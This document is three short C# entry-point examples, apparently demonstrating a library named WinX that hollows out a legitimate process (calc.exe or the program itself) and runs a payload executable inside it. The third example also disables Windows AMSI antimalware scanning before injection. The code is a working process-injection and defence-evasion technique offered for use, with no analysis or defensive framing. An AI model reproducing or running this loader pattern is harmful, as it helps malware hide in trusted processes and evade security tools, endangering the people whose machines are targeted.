public static int Main(string[] args) { byte[] payload_amd64 = File.ReadAllBytes("putty64.exe"); string calculator_amd64 = "C:\\Windows\\system32\\calc.exe"; string[] arguments = null; bool hidden = false; WinXParameters parameters = WinXParameters.Create(payload_amd64, calculator_amd64, hidden, arguments); WinX64.Start(parameters); return 0; }
public static int Main(string[] args) { byte[] payload_amd64 = File.ReadAllBytes("putty64.exe"); string calculator_amd64 = typeof(Program).Assembly.Location; string[] arguments = null; bool hidden = false; WinXParameters parameters = WinXParameters.Create(payload_amd64, calculator_amd64, hidden, arguments); WinXRunPE_AMD64.Start(parameters); return(0); }
public static int Main(string[] args) { WinXComponents.DisableAMSI(); string payloadFileName = "putty.exe"; if (IntPtr.Size * 8 == 64) { payloadFileName = "putty64.exe"; } var payload = File.ReadAllBytes(payloadFileName); string calculator = "C:\\Windows\\system32\\calc.exe"; string[] arguments = null; bool hidden = false; WinXParameters parameters = WinXParameters.Create(payload, calculator, hidden, arguments); WinX86.Start(parameters); return(0); }